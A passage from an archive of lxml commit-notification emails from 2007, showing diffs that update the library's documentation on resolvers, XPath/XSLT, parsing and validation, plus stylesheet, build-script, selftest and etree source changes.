Custom element class lookup -........................... +--------------------------- This is the most customisable way of finding element classes. 
It allows you to implement a custom lookup scheme in a subclass:: @@ -251,7 +254,7 @@ Implementing namespaces ------------------------ +======================= lxml allows you to implement namespaces, in a rather literal sense. After setting up the namespace class lookup mechanism as described above, you can Modified: lxml/branch/lxml-1.3/doc/resolvers.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/resolvers.txt (original) +++ lxml/branch/lxml-1.3/doc/resolvers.txt Tue Jun 12 19:00:36 2007 @@ -3,13 +3,20 @@ .. contents:: .. - 1 Document loaders in context - 2 I/O access control in XSLT + 1 Resolvers + 2 Document loading in context + 3 I/O access control in XSLT Lxml has support for custom document loaders in both the parsers and XSL transformations. These so-called resolvers are subclasses of the -etree.Resolver class as in the following example:: +etree.Resolver class. + + +Resolvers +--------- + +Here is an example of a custom resolver:: >>> from lxml import etree @@ -32,10 +39,10 @@ * ``resolve_file`` takes an open file-like object that has at least a read() method * ``resolve_empty`` resolves into an empty document -The ``resolve`` method may choose to return None, in which case the next -registered resolver (or the default resolver) is consulted. It is never -called if the resolver returns the result of any of the above ``resolve_*`` -methods. +The ``resolve()`` method may choose to return None, in which case the next +registered resolver (or the default resolver) is consulted. Resolving always +terminates if ``resolve()`` returns the result of any of the above +``resolve_*()`` methods. Resolvers are registered local to a parser:: @@ -58,7 +65,7 @@ fragment. 
-Document loaders in context +Document loading in context --------------------------- XML documents memorise their initial parser (and its resolvers) during their @@ -180,12 +187,16 @@ I/O access control in XSLT -------------------------- -XSLT has an additional mechanism to control the access to certain I/O -operations during the transformation process. This is most interesting where -XSL scripts come from potentially insecure sources and must be prevented from -modifying the local file system. Note, however, that there is no way to keep -them from eating up your precious CPU time, so this should not stop you from -thinking about what XSLT you execute. +By default, XSLT supports all extension functions from libxslt and libexslt as +well as Python regular expressions through EXSLT. Some extensions enable +style sheets to read and write files on the local file system. + +XSLT has a mechanism to control the access to certain I/O operations during +the transformation process. This is most interesting where XSL scripts come +from potentially insecure sources and must be prevented from modifying the +local file system. Note, however, that there is no way to keep them from +eating up your precious CPU time, so this should not stop you from thinking +about what XSLT you execute. Access control is configured using the ``XSLTAccessControl`` class. It can be called with a number of keyword arguments that allow or deny specific Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Tue Jun 12 19:00:36 2007 @@ -6,9 +6,19 @@ compliant way. .. contents:: -.. +.. 
1 XPath + 1.1 The ``xpath()`` method + 1.2 XPath return values + 1.3 The ``XPath`` class + 1.4 The ``XPathEvaluator`` classes + 1.5 ``ETXPath`` 2 XSLT + 2.1 XSLT result objects + 2.2 Stylesheet parameters + 2.3 The ``xslt()`` tree method + 2.4 Profiling + The usual setup procedure:: @@ -17,12 +27,17 @@ XPath ------ +===== -lxml.etree supports the simple path syntax of the ``findall()`` etc. methods -on ElementTree and Element, as known from the original ElementTree library. -As an extension, these classes also provide an ``xpath()`` method that -supports expressions in the complete XPath syntax. +lxml.etree supports the simple path syntax of the `find, findall and +findtext`_ methods on ElementTree and Element, as known from the original +ElementTree library (ElementPath_). As an lxml specific extension, these +classes also provide an ``xpath()`` method that supports expressions in the +complete XPath syntax, as well as `custom extension functions`_. + +.. _ElementPath: http://effbot.org/zone/element-xpath.htm +.. _`find, findall and findtext`: http://effbot.org/zone/element.htm#searching-for-subelements +.. _`custom extension functions`: extensions.html There are also specialized XPath evaluator classes that are more efficient for frequent evaluation: ``XPath`` and ``XPathEvaluator``. See the `performance @@ -32,6 +47,10 @@ .. 
_`performance comparison`: performance.html#xpath + +The ``xpath()`` method +---------------------- + For ElementTree, the xpath method performs a global XPath query against the document (if absolute) or against the root node (if relative):: @@ -48,7 +67,7 @@ >>> r[0].tag 'bar' -When ``xpath()`` is used on an element, the XPath expression is evaluated +When ``xpath()`` is used on an Element, the XPath expression is evaluated against the element (if relative) or against the root tree (if absolute):: >>> root = tree.getroot() @@ -66,6 +85,19 @@ >>> r[0].tag 'bar' +The ``xpath()`` method has support for XPath variables:: + + >>> expr = "//*[local-name() = $name]" + + >>> print root.xpath(expr, name = "foo")[0].tag + foo + + >>> print root.xpath(expr, name = "bar")[0].tag + bar + + >>> print root.xpath("$text", text = "Hello World!") + Hello World! + Optionally, you can provide a ``namespaces`` keyword argument, which should be a dictionary mapping the namespace prefixes used in the XPath expression to namespace URIs:: @@ -87,9 +119,11 @@ 'Text' There is also an optional ``extensions`` argument which is used to define -`extension functions`_ in Python that are local to this evaluation. +`custom extension functions`_ in Python that are local to this evaluation. + -.. _`extension functions`: extensions.html +XPath return values +------------------- The return values of XPath evaluations vary, depending on the XPath expression used: @@ -101,11 +135,10 @@ * a (unicode) string, when the XPath expression has a string result. * a list of items, when the XPath expression has a list as result. The items - may include elements, strings and tuples. Text nodes and attributes in the - result are returned as strings (the text node content or attribute value). - Comments are also returned as strings, enclosed by the usual ``<!--`` and - ``-->`` markers. Namespace declarations are returned as tuples of strings: - ``(prefix, URI)``. 
+ may include elements (also comments and processing instructions), strings + and tuples. Text nodes and attributes in the result are returned as strings + (the text node content or attribute value). Namespace declarations are + returned as tuples of strings: ``(prefix, URI)``. A related convenience method of ElementTree objects is ``getpath(element)``, which returns a structural, absolute XPath expression to find that element:: @@ -123,8 +156,98 @@ True +The ``XPath`` class +------------------- + +The ``XPath`` class compiles an XPath expression into a callable function:: + + >>> root = etree.XML("<root><a><b/></a><b/></root>") + + >>> find = etree.XPath("//b") + >>> print find(root)[0].tag + b + +The compilation takes as much time as in the ``xpath()`` method, but it is +done only once per class instantiation. This makes it especially efficient +for repeated evaluation of the same XPath expression. + +Just like the ``xpath()`` method, the ``XPath`` class supports XPath +variables:: + + >>> count_elements = etree.XPath("count(//*[local-name() = $name])") + + >>> print count_elements(root, name = "a") + 1.0 + >>> print count_elements(root, name = "b") + 2.0 + +This supports very efficient evaluation of modified versions of an XPath +expression, as compilation is still only required once. + +Prefix-to-namespace mappings can be passed as second parameter:: + + >>> root = etree.XML("<root xmlns='NS'><a><b/></a><b/></root>") + + >>> find = etree.XPath("//n:b", {'n':'NS'}) + >>> print find(root)[0].tag + {NS}b + + +The ``XPathEvaluator`` classes +------------------------------ + +lxml.etree provides two other efficient XPath evaluators that work on +ElementTrees or Elements respectively: ``XPathDocumentEvaluator`` and +``XPathElementEvaluator``. 
They are automatically selected if you use the +XPathEvaluator helper for instantiation:: + + >>> root = etree.XML("<root><a><b/></a><b/></root>") + >>> xpatheval = etree.XPathEvaluator(root) + + >>> print isinstance(xpatheval, etree.XPathElementEvaluator) + True + + >>> print xpatheval("//b")[0].tag + b + +This class provides efficient support for evaluating different XPath +expressions on the same Element or ElementTree. + + +``ETXPath`` +----------- + +ElementTree supports a language named ElementPath_ in its ``find*()`` methods. +One of the main differences between XPath and ElementPath is that the XPath +language requires an indirection through prefixes for namespace support, +whereas ElementTree uses the Clark notation (``{ns}name``) to avoid prefixes +completely. The other major difference regards the capabilities of both path +languages. Where XPath supports various sophisticated ways of restricting the +result set through functions and boolean expressions, ElementPath only +supports pure path traversal without nesting or further conditions. So, while +the ElementPath syntax is self-contained and therefore easier to write and +handle, XPath is much more powerful and expressive. + +lxml.etree bridges this gap through the class ``ETXPath``, which accepts XPath +expressions with namespaces in Clark notation. It is identical to the +``XPath`` class, except for the namespace notation. Normally, you would +write:: + + >>> root = etree.XML("<root xmlns='ns'><a><b/></a><b/></root>") + + >>> find = etree.XPath("//p:b", {'p' : 'ns'}) + >>> print find(root)[0].tag + {ns}b + +``ETXPath`` allows you to change this to:: + + >>> find = etree.ETXPath("//{ns}b") + >>> print find(root)[0].tag + {ns}b + + XSLT ----- +==== lxml.etree introduces a new class, lxml.etree.XSLT. 
The class can be given an ElementTree object to construct an XSLT transformer:: @@ -144,9 +267,28 @@ >>> f = StringIO('<a><b>Text</b></a>') >>> doc = etree.parse(f) - >>> result = transform(doc) + >>> result_tree = transform(doc) -The result object can be accessed like a normal ElementTree document:: +By default, XSLT supports all extension functions from libxslt and libexslt +as well as Python regular expressions through the `EXSLT regexp functions`_. +Also see the documentation on `custom extension functions`_ and `document +resolvers`_. There is a separate section on `controlling access`_ to +external documents and resources. + +.. _`EXSLT regexp functions`: http://www.exslt.org/regexp/ +.. _`document resolvers`: resolvers.html +.. _`controlling access`: resolvers.html#i-o-access-control-in-xslt + + +XSLT result objects +------------------- + +The result of an XSL transformation can be accessed like a normal ElementTree +document:: + + >>> f = StringIO('<a><b>Text</b></a>') + >>> doc = etree.parse(f) + >>> result = transform(doc) >>> result.getroot().text 'Text' @@ -185,6 +327,10 @@ [...] LookupError: unknown encoding: UCS4 + +Stylesheet parameters +--------------------- + It is possible to pass parameters, in the form of XPath expressions, to the XSLT template:: @@ -212,7 +358,11 @@ >>> str(result) '<?xml version="1.0"?>\n<foo>Text</foo>\n' -There's also a convenience method on the tree object for doing XSL + +The ``xslt()`` tree method +-------------------------- + +There's also a convenience method on ElementTree objects for doing XSL transformations. This is less efficient if you want to apply the same XSL transformation to multiple documents, but is shorter to write for one-shot operations, as you do not have to instantiate a stylesheet yourself:: @@ -221,12 +371,16 @@ >>> str(result) '<?xml version="1.0"?>\n<foo>A</foo>\n' -By default, XSLT supports all extension functions from libxslt and libexslt as -well as Python regular expressions through EXSLT. 
Note that some extensions -enable style sheets to read and write files on the local file system. See the -`document loader documentation`_ on how to deal with this. +This is a shortcut for the following code:: + + >>> transform = etree.XSLT(xslt_tree) + >>> result = transform(doc, a="'A'") + >>> str(result) + '<?xml version="1.0"?>\n<foo>A</foo>\n' + -.. _`document loader documentation`: resolvers.html +Profiling +--------- If you want to know how your stylesheet performed, pass the ``profile_run`` keyword to the transform:: From scoder at codespeak.net Tue Jun 12 19:03:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:03:10 +0200 (CEST) Subject: [Lxml-checkins] r44182 - lxml/branch/lxml-1.3/doc Message-ID: <20070612170310.714668194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:03:10 2007 New Revision: 44182 Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt Log: doc updates from trunk (XPath/XSLT) Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Tue Jun 12 19:03:10 2007 @@ -10,9 +10,10 @@ 1 XPath 1.1 The ``xpath()`` method 1.2 XPath return values - 1.3 The ``XPath`` class - 1.4 The ``XPathEvaluator`` classes - 1.5 ``ETXPath`` + 1.3 Generating XPath expressions + 1.4 The ``XPath`` class + 1.5 The ``XPathEvaluator`` classes + 1.6 ``ETXPath`` 2 XSLT 2.1 XSLT result objects 2.2 Stylesheet parameters @@ -140,8 +141,12 @@ (the text node content or attribute value). Namespace declarations are returned as tuples of strings: ``(prefix, URI)``. 
-A related convenience method of ElementTree objects is ``getpath(element)``, -which returns a structural, absolute XPath expression to find that element:: + +Generating XPath expressions +---------------------------- + +ElementTree objects have a method ``getpath(element)``, which returns a +structural, absolute XPath expression to find that element:: >>> a = etree.Element("a") >>> b = etree.SubElement(a, "b") From scoder at codespeak.net Tue Jun 12 19:06:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:06:58 +0200 (CEST) Subject: [Lxml-checkins] r44183 - in lxml/branch/lxml-1.3: doc src/lxml Message-ID: <20070612170658.5384B8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:06:58 2007 New Revision: 44183 Modified: lxml/branch/lxml-1.3/doc/parsing.txt lxml/branch/lxml-1.3/doc/validation.txt lxml/branch/lxml-1.3/src/lxml/parser.pxi Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 12 19:06:58 2007 @@ -18,26 +18,56 @@ Parsers -------- +======= Parsers are represented by parser objects. There is support for parsing both -XML and (broken) HTML (note that XHTML is best parsed as XML). Both are based -on libxml2 and therefore only support options that are backed by the library. -Parsers take a number of keyword arguments. The following is an example for -namespace cleanup during parsing, first with the default parser, then with a -parametrized one:: +XML and (broken) HTML. Note that XHTML is best parsed as XML, parsing it with +the HTML parser can lead to unexpected results. 
Here is a simple example for +XML parsing:: >>> xml = '<a xmlns="test"><b xmlns="test"/></a>' - >>> et = etree.parse(StringIO(xml)) + >>> et = etree.parse(StringIO(xml)) >>> print etree.tostring(et.getroot()) <a xmlns="test"><b xmlns="test"/></a> + +Parser options +-------------- + +The parsers accept a number of setup options as keyword arguments. The above +example is easily extended to clean up namespaces during parsing:: + >>> parser = etree.XMLParser(ns_clean=True) >>> et = etree.parse(StringIO(xml), parser) >>> print etree.tostring(et.getroot()) <a xmlns="test"><b/></a> +The keyword arguments in the constructor are mainly based on the libxml2 +parser configuration. A DTD will also be loaded if validation or attribute +default values are requested. + +Available boolean keyword arguments: + +* attribute_defaults - read the DTD (if referenced by the document) and add + the default attributes from it + +* dtd_validation - validate while parsing (if a DTD was referenced) + +* load_dtd - load and parse the DTD while parsing (no validation is performed) + +* no_network - prevent network access when looking up external documents + +* ns_clean - try to clean up redundant namespace declarations + +* recover - try hard to parse through broken XML + +* remove_blank_text - discard blank text nodes between tags + + +Parsing HTML +------------ + HTML parsing is similarly simple. The parsers have a ``recover`` keyword argument that the HTMLParser sets by default. It lets libxml2 try its best to return something usable without raising an exception. You should use libxml2 @@ -48,15 +78,29 @@ >>> parser = etree.HTMLParser() >>> et = etree.parse(StringIO(broken_html), parser) - >>> print etree.tostring(et.getroot()) - <html><head><title>test

page title

+ >>> print etree.tostring(et.getroot(), pretty_print=True) + + + test + + +

page title

+ + Lxml has an HTML function, similar to the XML shortcut known from ElementTree:: >>> html = etree.HTML(broken_html) - >>> print etree.tostring(html) - test

page title

+ >>> print etree.tostring(html, pretty_print=True) + + + test + + +

page title

+ + The support for parsing broken HTML depends entirely on libxml2's recovery algorithm. It is *not* the fault of lxml if you find documents that are so @@ -66,6 +110,10 @@ parsing. Especially misplaced meta tags can suffer from this, which may lead to encoding problems. + +Doctype information +------------------- + The use of the libxml2 parsers makes some additional information available at the API level. Currently, ElementTree objects can access the DOCTYPE information provided by a parsed document, as well as the XML version and the @@ -93,7 +141,7 @@ iterparse and iterwalk ----------------------- +====================== As known from ElementTree, the ``iterparse()`` utility function returns an iterator that generates parser events for an XML file (or file-like object), @@ -125,7 +173,7 @@ >>> context.root.tag 'root' -The other types can be activated with the ``events`` keyword argument:: +The other event types can be activated with the ``events`` keyword argument:: >>> events = ("start", "end") >>> context = etree.iterparse(StringIO(xml), events=events) @@ -140,6 +188,32 @@ end {testns}empty-element end root + +Selective tag events +-------------------- + +As an extension over ElementTree, lxml.etree accepts a ``tag`` keyword +argument just like ``element.getiterator(tag)``. This restricts events to a +specific tag or namespace:: + + >>> context = etree.iterparse(StringIO(xml), tag="element") + >>> for action, elem in context: + ... print action, elem.tag + end element + end element + + >>> events = ("start", "end") + >>> context = etree.iterparse( + ... StringIO(xml), events=events, tag="{testns}*") + >>> for action, elem in context: + ... print action, elem.tag + start {testns}empty-element + end {testns}empty-element + + +Modifying the tree +------------------ + You can modify the element and its descendants when handling the 'end' event. To save memory, for example, you can remove subtrees that are no longer needed:: @@ -170,11 +244,12 @@ ... 
if element.getprevious(): # clean up preceding siblings ... del element.getparent()[0] -You can use ``while`` instead of ``if`` if you skipped siblings using the -``tag`` keyword argument. The more selective your tag is, however, the more -thought you will have to put into finding the right way to clean up the -elements that were skipped. Therefore, it is sometimes easier to traverse all -elements and do the tag selection by hand in the event handler code. +You can use ``while`` instead of the ``if`` to delete multiple siblings in a +row if you skipped over them using the ``tag`` keyword argument. The more +selective your tag is, however, the more thought you will have to put into +finding the right way to clean up the elements that were skipped. Therefore, +it is sometimes easier to traverse all elements and do the tag selection by +hand in the event handler code. The 'start-ns' and 'end-ns' events notify about namespace declarations and generate tuples ``(prefix, URI)``:: @@ -189,28 +264,28 @@ It is common practice to use a list as namespace stack and pop the last entry on the 'end-ns' event. -lxml.etree supports two extensions compared to ElementTree. It accepts a -``tag`` keyword argument just like ``element.getiterator(tag)``. This -restricts events to a specific tag or namespace. - >>> context = etree.iterparse(StringIO(xml), tag="element") +iterwalk +-------- + +A second extension over ElementTree is the ``iterwalk()`` function. It +behaves exactly like ``iterparse()``, but works on Elements and ElementTrees:: + + + >>> root = etree.XML(xml) + >>> context = etree.iterwalk( + ... root, events=("start", "end"), tag="element") >>> for action, elem in context: ... print action, elem.tag + start element end element + start element end element - >>> events = ("start", "end") - >>> context = etree.iterparse(StringIO(xml), events=events, tag="{testns}*") - >>> for action, elem in context: - ... 
print action, elem.tag - start {testns}empty-element - end {testns}empty-element - -The second extension is the ``iterwalk()`` function. It behaves exactly like -``iterparse()``, but works on Elements and ElementTrees:: + >>> f = StringIO(xml) + >>> context = etree.iterparse( + ... f, events=("start", "end"), tag="element") - >>> root = context.root - >>> context = etree.iterwalk(root, events=events, tag="element") >>> for action, elem in context: ... print action, elem.tag start element @@ -220,7 +295,7 @@ Python unicode strings ----------------------- +====================== lxml.etree has broader support for Python unicode strings than the ElementTree library. First of all, where ElementTree would raise an exception, the @@ -246,6 +321,10 @@ should generally avoid converting XML/HTML data to unicode before passing it into the parsers. It is both slower and error prone. + +Serialising to Unicode strings +------------------------------ + To serialize the result, you would normally use the ``tostring`` module function, which serializes to plain ASCII by default or a number of other encodings if asked for:: Modified: lxml/branch/lxml-1.3/doc/validation.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/validation.txt (original) +++ lxml/branch/lxml-1.3/doc/validation.txt Tue Jun 12 19:06:58 2007 @@ -4,7 +4,7 @@ Apart from the built-in DTD support in parsers, lxml currently supports three schema languages: DTD_, `Relax NG`_ and `XML Schema`_. All three provide -identical APIs in lxml, represented by a validator class with the obvious +identical APIs in lxml, represented by validator classes with the obvious names. .. 
_DTD: http://en.wikipedia.org/wiki/Document_Type_Definition Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Tue Jun 12 19:06:58 2007 @@ -664,14 +664,9 @@ * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes - For read-only documents that will not be altered after parsing, you can - also pass the following keyword arguments: - * compact - compactly store short element text content - - Note that you should avoid sharing parsers between threads. This does not + Note that you should avoid sharing parsers between threads. While this is + not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. - - You must not modify documents that were parsed with the 'compact' option. """ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, ns_clean=False, @@ -794,12 +789,8 @@ * no_network - prevent network access * remove_blank_text - discard empty text nodes - For read-only documents that will not be altered after parsing, you can - also pass the following keyword arguments: - * compact - compactly store short element text content - - Note that you should avoid sharing parsers between threads. You must not - modify documents that were parsed with the 'compact' option. + Note that you should avoid sharing parsers between threads for performance + reasons. """ def __init__(self, recover=True, no_network=False, remove_blank_text=False, compact=True): From scoder at codespeak.net Tue Jun 12 19:09:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:09:01 +0200 (CEST) Subject: [Lxml-checkins] r44185 - in lxml/branch/lxml-1.3/doc: . 
html Message-ID: <20070612170901.4286E8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:09:00 2007 New Revision: 44185 Modified: lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/parsing.txt Log: merged in doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 19:09:00 2007 @@ -8,14 +8,14 @@ padding: 1em 1em 1em 21em; } - div.document { + div.document, div.footer { width: 45em; background-color: white; } } @media print { - div.document { + div.document, div.footer { width: auto; padding-left: 0px; } @@ -25,12 +25,20 @@ } } -div.document { +div.document, div.footer { margin: 1em auto 1em auto; color: #222; +} + +div.document { text-align: left; } +div.footer { + text-align: center; + font-size: 70%; +} + /*** TOC ***/ div.contents.topic > ul { @@ -169,6 +177,12 @@ margin: 0.5em 0em 0em 0em; } +th.docinfo-name { + padding-left: 3ex; + text-align: right; + font-weight: bold; +} + hr { clear: both; height: 1px; Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Tue Jun 12 19:09:00 2007 @@ -1,5 +1,5 @@ from lxml.etree import parse, Element, SubElement, XPath -import os, shutil, re, sys, copy +import os, shutil, re, sys, copy, time SITE_STRUCTURE = [ ('lxml', ('main.txt', 'intro.txt', 'FAQ.txt', 'compatibility.txt', @@ -13,6 +13,8 @@ RST2HTML_OPTIONS = " ".join([ "--no-toc-backlinks", "--strip-comments", + "--language en", + "--date", ]) find_title = XPath("/h:html/h:head/h:title/text()", @@ -21,6 +23,8 @@ {"h" : "http://www.w3.org/1999/xhtml"}) find_menu = XPath("//h:ul[@id=$name]", {"h" : "http://www.w3.org/1999/xhtml"}) +find_page_end = 
XPath("/h:html/h:body/h:div[last()]", + {"h" : "http://www.w3.org/1999/xhtml"}) replace_invalid = re.compile(r'[-_/.\s\\]').sub Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 12 19:09:00 2007 @@ -240,16 +240,17 @@ >>> for event, element in etree.iterparse(StringIO(xml)): ... # ... do something with the element - ... element.clear() # clean up children - ... if element.getprevious(): # clean up preceding siblings - ... del element.getparent()[0] - -You can use ``while`` instead of the ``if`` to delete multiple siblings in a -row if you skipped over them using the ``tag`` keyword argument. The more -selective your tag is, however, the more thought you will have to put into -finding the right way to clean up the elements that were skipped. Therefore, -it is sometimes easier to traverse all elements and do the tag selection by -hand in the event handler code. + ... element.clear() # clean up children + ... while element.getprevious() is not None: + ... del element.getparent()[0] # clean up preceding siblings + +The ``while`` loop deletes multiple siblings in a row. This is only necessary +if you skipped over some of them using the ``tag`` keyword argument. +Otherwise, a simple ``if`` should do. The more selective your tag is, +however, the more thought you will have to put into finding the right way to +clean up the elements that were skipped. Therefore, it is sometimes easier to +traverse all elements and do the tag selection by hand in the event handler +code. The 'start-ns' and 'end-ns' events notify about namespace declarations and generate tuples ``(prefix, URI)``:: From scoder at codespeak.net Tue Jun 12 19:11:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:11:48 +0200 (CEST) Subject: [Lxml-checkins] r44186 - in lxml/branch/lxml-1.3: . 
src/lxml src/lxml/tests Message-ID: <20070612171148.168168198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:11:47 2007 New Revision: 44186 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/selftest.py lxml/branch/lxml-1.3/selftest2.py lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/iterparse.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Log: merged in revs 43159:43235 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:11:47 2007 @@ -22,6 +22,12 @@ Bugs fixed ---------- +* More ET compatible behaviour when writing out XML declarations or not + +* ``Element.attrib`` was missing ``clear()`` method + +* More robust error handling in ``iterparse()`` + * Documents lost their top-level PIs and comments on serialisation * lxml.sax failed on comments and PIs. Comments are now properly ignored and Modified: lxml/branch/lxml-1.3/selftest.py ============================================================================== --- lxml/branch/lxml-1.3/selftest.py (original) +++ lxml/branch/lxml-1.3/selftest.py Tue Jun 12 19:11:47 2007 @@ -272,28 +272,31 @@ ## '

spamegg

' ## """ -## def parseliteral(): -## r""" -## >>> element = ElementTree.XML("text") -## >>> ElementTree.ElementTree(element).write(sys.stdout) -## text -## >>> element = ElementTree.fromstring("text") -## >>> ElementTree.ElementTree(element).write(sys.stdout) -## text -## >>> print ElementTree.tostring(element) -## text -## >>> print ElementTree.tostring(element, "ascii") -## -## text -## >>> _, ids = ElementTree.XMLID("text") -## >>> len(ids) -## 0 -## >>> _, ids = ElementTree.XMLID("text") -## >>> len(ids) -## 1 -## >>> ids["body"].tag -## 'body' -## """ +def parseliteral(): + r""" + >>> element = ElementTree.XML("text") + >>> ElementTree.ElementTree(element).write(sys.stdout) + text + >>> element = ElementTree.fromstring("text") + >>> ElementTree.ElementTree(element).write(sys.stdout) + text + >>> print ElementTree.tostring(element) + text + +# looks different in lxml +# >>> print ElementTree.tostring(element, "ascii") +# +# text + + >>> _, ids = ElementTree.XMLID("text") + >>> len(ids) + 0 + >>> _, ids = ElementTree.XMLID("text") + >>> len(ids) + 1 + >>> ids["body"].tag + 'body' + """ ## def simpleparsefile(): ## """ @@ -519,16 +522,18 @@ ## """ -## def xmllang(): -## """ -## This appears to be a problem; in underlying libxml2? +def xmllang(): + """ + This appears to be a problem; in underlying libxml2? -## 1) xml namespace + 1) xml namespace -## >>> elem = ElementTree.XML("") -## >>> serialize(elem) # 1.1 -## '' -## """ + >>> elem = ElementTree.XML("") + >>> serialize(elem) # 1.1 + '' + +# '' # ElementTree produces an extra blank + """ def namespace(): """ Modified: lxml/branch/lxml-1.3/selftest2.py ============================================================================== --- lxml/branch/lxml-1.3/selftest2.py (original) +++ lxml/branch/lxml-1.3/selftest2.py Tue Jun 12 19:11:47 2007 @@ -133,30 +133,30 @@ 'textsubtext' """ -## def encoding(): -## r""" -## Test encoding issues. +def encoding(): + r""" + Test encoding issues. 
-## >>> elem = ElementTree.Element("tag") -## >>> elem.text = u"abc" -## >>> serialize(elem) -## 'abc' -## >>> serialize(elem, "utf-8") -## 'abc' -## >>> serialize(elem, "us-ascii") -## 'abc' -## >>> serialize(elem, "iso-8859-1") -## "\nabc" + >>> elem = ElementTree.Element("tag") + >>> elem.text = u"abc" + >>> serialize(elem) + 'abc' + >>> serialize(elem, "utf-8") + 'abc' + >>> serialize(elem, "us-ascii") + 'abc' + >>> serialize(elem, "iso-8859-1").lower() + "\nabc" -## >>> elem.text = "<&\"\'>" -## >>> serialize(elem) -## '<&"\'>' -## >>> serialize(elem, "utf-8") -## '<&"\'>' -## >>> serialize(elem, "us-ascii") # cdata characters -## '<&"\'>' -## >>> serialize(elem, "iso-8859-1") -## '\n<&"\'>' + >>> elem.text = "<&\"\'>" + >>> serialize(elem) + '<&"\'>' + >>> serialize(elem, "utf-8") + '<&"\'>' + >>> serialize(elem, "us-ascii") # cdata characters + '<&"\'>' + >>> serialize(elem, "iso-8859-1").lower() + '\n<&"\'>' ## >>> elem.attrib["key"] = "<&\"\'>" ## >>> elem.text = None @@ -169,16 +169,16 @@ ## >>> serialize(elem, "iso-8859-1") ## '\n' -## >>> elem.text = u'\xe5\xf6\xf6<>' -## >>> elem.attrib.clear() -## >>> serialize(elem) -## 'åöö<>' -## >>> serialize(elem, "utf-8") -## '\xc3\xa5\xc3\xb6\xc3\xb6<>' -## >>> serialize(elem, "us-ascii") -## 'åöö<>' -## >>> serialize(elem, "iso-8859-1") -## "\n\xe5\xf6\xf6<>" + >>> elem.text = u'\xe5\xf6\xf6<>' + >>> elem.attrib.clear() + >>> serialize(elem) + 'åöö<>' + >>> serialize(elem, "utf-8") + '\xc3\xa5\xc3\xb6\xc3\xb6<>' + >>> serialize(elem, "us-ascii") + 'åöö<>' + >>> serialize(elem, "iso-8859-1").lower() + "\n\xe5\xf6\xf6<>" ## >>> elem.attrib["key"] = u'\xe5\xf6\xf6<>' ## >>> elem.text = None @@ -191,25 +191,25 @@ ## >>> serialize(elem, "iso-8859-1") ## '\n' -## """ + """ -## def qname(): -## """ -## Test QName handling. +def qname(): + """ + Test QName handling. 
-## 1) decorated tags + 1) decorated tags -## >>> elem = ElementTree.Element("{uri}tag") -## >>> serialize(elem) # 1.1 -## '' + >>> elem = ElementTree.Element("{uri}tag") + >>> serialize(elem) # 1.1 + '' ## 2) decorated attributes ## >>> elem.attrib["{uri}key"] = "value" ## >>> serialize(elem) # 2.1 -## '' +## '' -## """ + """ def cdata(): """ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:11:47 2007 @@ -1453,6 +1453,12 @@ _delAttribute(self._element, key) return result + def clear(self): + cdef xmlNode* c_node + c_node = self._element._c_node + while c_node.properties is not NULL: + tree.xmlRemoveProp(c_node.properties) + # ACCESSORS def __repr__(self): return repr(dict( _attributeIteratorFactory(self._element, 3) )) @@ -1871,17 +1877,15 @@ """ cdef int write_declaration cdef int c_pretty_print - if encoding is None: - encoding = 'ASCII' - else: - encoding = encoding.upper() c_pretty_print = bool(pretty_print) if xml_declaration is None: # by default, write an XML declaration only for non-standard encodings - write_declaration = encoding not in \ + write_declaration = encoding is not None and encoding.upper() not in \ ('ASCII', 'UTF-8', 'UTF8', 'US-ASCII') else: write_declaration = bool(xml_declaration) + if encoding is None: + encoding = 'ASCII' if isinstance(element_or_tree, _Element): return _tostring(<_Element>element_or_tree, Modified: 